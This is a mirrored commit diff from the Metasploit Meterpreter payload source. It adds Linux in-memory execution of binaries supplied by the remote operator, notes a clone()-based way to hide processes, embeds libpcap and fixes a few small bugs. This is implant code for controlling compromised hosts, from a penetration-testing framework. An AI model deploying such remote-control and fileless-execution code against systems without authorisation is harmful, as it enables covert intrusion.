1
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-21 05:35:54 +01:00

commit some fixes from philip, see #2418

git-svn-id: file:///home/svn/framework3/trunk@10272 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Joshua Drake 2010-09-09 15:39:28 +00:00
parent 600afb35e5
commit 466153da06
7 changed files with 51 additions and 23 deletions

View File

@ -294,11 +294,11 @@ scheduler_run(THREAD *thread)
LIST_REMOVE(current, link); LIST_REMOVE(current, link);
close(current->waitable); close(current->waitable);
channel_close((Channel *)current->context, remote, NULL, 0, NULL);
free(current); free(current);
nentries--; nentries--;
// how do we notify remote that we have closed fd?
// it just hangs atm :~(
} }
} }
} }

View File

@ -17,6 +17,9 @@
#include <sys/select.h> #include <sys/select.h>
#include <sys/endian.h> #include <sys/endian.h>
#include <netinet/in.h> #include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <unistd.h>
// only do debugging on unix side of things for now. // only do debugging on unix side of things for now.
#define DEBUGTRACE #define DEBUGTRACE

View File

@ -10,6 +10,10 @@ typedef BOOL (STDMETHODCALLTYPE FAR * LPFNCREATEENVIRONMENTBLOCK)( LPVOID *lpEn
typedef BOOL (STDMETHODCALLTYPE FAR * LPFNDESTROYENVIRONMENTBLOCK) ( LPVOID lpEnvironment ); typedef BOOL (STDMETHODCALLTYPE FAR * LPFNDESTROYENVIRONMENTBLOCK) ( LPVOID lpEnvironment );
typedef BOOL (WINAPI * LPCREATEPROCESSWITHTOKENW)( HANDLE, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION ); typedef BOOL (WINAPI * LPCREATEPROCESSWITHTOKENW)( HANDLE, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION );
#else
#include "linux-in-mem-exe.h"
#endif #endif
/* /*
@ -21,8 +25,8 @@ typedef BOOL (WINAPI * LPCREATEPROCESSWITHTOKENW)( HANDLE, DWORD, LPCWSTR, LPWST
DWORD request_sys_process_attach(Remote *remote, Packet *packet) DWORD request_sys_process_attach(Remote *remote, Packet *packet)
{ {
Packet *response = packet_create_response(packet); Packet *response = packet_create_response(packet);
HANDLE handle = NULL;
#ifdef _WIN32 #ifdef _WIN32
HANDLE handle = NULL;
DWORD result = ERROR_SUCCESS; DWORD result = ERROR_SUCCESS;
DWORD pid; DWORD pid;
@ -67,21 +71,22 @@ DWORD request_sys_process_close(Remote *remote, Packet *packet)
{ {
Packet *response = packet_create_response(packet); Packet *response = packet_create_response(packet);
HANDLE handle; HANDLE handle;
#ifdef _WIN32
DWORD result = ERROR_SUCCESS; DWORD result = ERROR_SUCCESS;
handle = (HANDLE)packet_get_tlv_value_uint(packet, TLV_TYPE_HANDLE); handle = (HANDLE)packet_get_tlv_value_uint(packet, TLV_TYPE_HANDLE);
if (handle) if (handle)
{ {
#ifdef _WIN32
if (handle != GetCurrentProcess()) if (handle != GetCurrentProcess())
CloseHandle(handle); CloseHandle(handle);
#else
// XXX ... not entirely sure this ports across.
#endif
} }
else else
result = ERROR_INVALID_PARAMETER; result = ERROR_INVALID_PARAMETER;
#else
DWORD result = ERROR_NOT_SUPPORTED;
#endif
// Send the response packet to the requestor // Send the response packet to the requestor
packet_transmit_response(result, remote, response); packet_transmit_response(result, remote, response);
@ -155,6 +160,8 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
{ {
Packet *response = packet_create_response(packet); Packet *response = packet_create_response(packet);
DWORD result = ERROR_SUCCESS; DWORD result = ERROR_SUCCESS;
Tlv inMemoryData;
BOOL doInMemory = FALSE;
#ifdef _WIN32 #ifdef _WIN32
PROCESS_INFORMATION pi; PROCESS_INFORMATION pi;
STARTUPINFO si; STARTUPINFO si;
@ -162,8 +169,6 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
PCHAR path, arguments, commandLine = NULL; PCHAR path, arguments, commandLine = NULL;
DWORD flags = 0, createFlags = 0; DWORD flags = 0, createFlags = 0;
BOOL inherit = FALSE; BOOL inherit = FALSE;
Tlv inMemoryData;
BOOL doInMemory = FALSE;
HANDLE token, pToken; HANDLE token, pToken;
char * cpDesktop = NULL; char * cpDesktop = NULL;
DWORD session = 0; DWORD session = 0;
@ -546,7 +551,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
if( cpDesktop ) if( cpDesktop )
free( cpDesktop ); free( cpDesktop );
#else #else
PCHAR path, arguments, commandLine = NULL; PCHAR path, arguments;;
DWORD flags; DWORD flags;
char *argv[64], *p; char *argv[64], *p;
int in[2] = { -1, -1 }, out[2] = {-1, -1}; // file descriptors int in[2] = { -1, -1 }, out[2] = {-1, -1}; // file descriptors
@ -556,6 +561,8 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
pid_t pid; pid_t pid;
int have_pty = -1; int have_pty = -1;
int hidden = (flags & PROCESS_EXECUTE_FLAG_HIDDEN);
dprintf( "[PROCESS] request_sys_process_execute" ); dprintf( "[PROCESS] request_sys_process_execute" );
do { do {
@ -566,6 +573,11 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
dprintf("path: %s, arguments: %s\n", path ? path : "(null)", arguments ? arguments : "(null)"); dprintf("path: %s, arguments: %s\n", path ? path : "(null)", arguments ? arguments : "(null)");
if (packet_get_tlv(packet, TLV_TYPE_VALUE_DATA, &inMemoryData) == ERROR_SUCCESS)
{
doInMemory = TRUE;
}
// how to handle a single string argument line? we don't have a lexer/parser to // how to handle a single string argument line? we don't have a lexer/parser to
// correctly handle stuff like quotes, etc. could dumbly parse on white space to // correctly handle stuff like quotes, etc. could dumbly parse on white space to
// build arguments for execve. revert to /bin/sh -c style execution? // build arguments for execve. revert to /bin/sh -c style execution?
@ -663,6 +675,12 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
} }
} }
/*
* We can create "hidden" processes via clone() instead of fork()
* clone(child_stack, flags = CLONE_THREAD) should do the trick. Probably worth while as well.
* memory / fd's etc won't be shared. linux specific syscall though.
*/
pid = fork(); pid = fork();
switch(pid) { switch(pid) {
@ -672,7 +690,8 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
break; break;
case 0: case 0:
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) { if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED)
{
if(have_pty) if(have_pty)
{ {
dup2(slave, 0); dup2(slave, 0);
@ -690,9 +709,16 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
} }
for(i = 3; i < 1024; i++) close(i); for(i = 3; i < 1024; i++) close(i);
if(doInMemory)
{
perform_in_mem_exe(argv, environ, inMemoryData.buffer);
} else {
execve(path, argv, environ); execve(path, argv, environ);
exit(EXIT_FAILURE); }
dprintf("[%s] failed to execute program, exit(EXIT_FAILURE) time", __FUNCTION__);
exit(EXIT_FAILURE);
default: default:
dprintf("child pid is %d\n", pid); dprintf("child pid is %d\n", pid);
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) { if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) {
@ -826,7 +852,7 @@ DWORD request_sys_process_getpid(Remote *remote, Packet *packet)
#ifdef _WIN32 #ifdef _WIN32
packet_add_tlv_uint(response, TLV_TYPE_PID, GetCurrentProcessId()); packet_add_tlv_uint(response, TLV_TYPE_PID, GetCurrentProcessId());
#else #else
packet_add_tlv_uint(response, TLV_TYPE_PID, gettid()); packet_add_tlv_uint(response, TLV_TYPE_PID, getpid());
#endif #endif
packet_transmit_response(ERROR_SUCCESS, remote, response); packet_transmit_response(ERROR_SUCCESS, remote, response);

View File

@ -33,7 +33,10 @@ libsupport.h: ../../bionic/compiled/libsupport.so
libmetsrv_main.h: ../../bionic/compiled/libmetsrv_main.so libmetsrv_main.h: ../../bionic/compiled/libmetsrv_main.so
../../../tools/so2h.pl ../../bionic/compiled/libmetsrv_main.so libmetsrv_main ../../../tools/so2h.pl ../../bionic/compiled/libmetsrv_main.so libmetsrv_main
metsrv_rtld.o: libc.h libm.h libcrypto.h libssl.h libmetsrv_main.h libsupport.h libpcap.h: ../../bionic/compiled/libpcap.so
../../../tools/so2h.pl ../../bionic/compiled/libpcap.so libpcap
metsrv_rtld.o: libc.h libm.h libcrypto.h libssl.h libmetsrv_main.h libsupport.h libpcap.h
rtldtest: rtldtest.c msflinker rtldtest: rtldtest.c msflinker
gcc -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'` gcc -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'`

View File

@ -27,6 +27,7 @@
#include "libssl.h" #include "libssl.h"
#include "libsupport.h" #include "libsupport.h"
#include "libmetsrv_main.h" #include "libmetsrv_main.h"
#include "libpcap.h"
struct libs { struct libs {
char *name; char *name;
@ -42,6 +43,7 @@ static struct libs libs[] = {
{ "libssl.so.0.9.8", libssl, libssl_length, NULL }, { "libssl.so.0.9.8", libssl, libssl_length, NULL },
{ "libsupport.so", libsupport, libsupport_length, NULL }, { "libsupport.so", libsupport, libsupport_length, NULL },
{ "libmetsrv_main.so", libmetsrv_main, libmetsrv_main_length, NULL }, { "libmetsrv_main.so", libmetsrv_main, libmetsrv_main_length, NULL },
{ "libpcap.so.1", libpcap, libpcap_length, NULL },
}; };
#define LIBC_IDX 0 #define LIBC_IDX 0

View File

@ -547,12 +547,6 @@ _do_lookup(soinfo *si, const char *name, unsigned *base)
} }
} }
if(! strncmp(name, "dl", 2)) {
s = _elf_lookup(&libdl_info, elf_hash, name);
if((s != NULL) && (s->st_shndx != SHN_UNDEF))
goto done;
}
#if ALLOW_SYMBOLS_FROM_MAIN #if ALLOW_SYMBOLS_FROM_MAIN
/* If we are resolving relocations while dlopen()ing a library, it's OK for /* If we are resolving relocations while dlopen()ing a library, it's OK for
* the library to resolve a symbol that's defined in the executable itself, * the library to resolve a symbol that's defined in the executable itself,

View File

@ -27,7 +27,7 @@ endif
objects = server/general.o server/stdapi.o server/fs/dir.o server/fs/file.o \ objects = server/general.o server/stdapi.o server/fs/dir.o server/fs/file.o \
server/fs/fs_util.o \ server/fs/fs_util.o \
server/net/socket/tcp.o server/net/socket/tcp_server.o server/net/socket/udp.o \ server/net/socket/tcp.o server/net/socket/tcp_server.o server/net/socket/udp.o \
server/sys/config/config.o server/sys/process/process.o server/sys/config/config.o server/sys/process/process.o server/sys/process/linux-in-mem-exe.o
#server/net/config/interface.o \ #server/net/config/interface.o \
#server/net/config/route.o \ #server/net/config/route.o \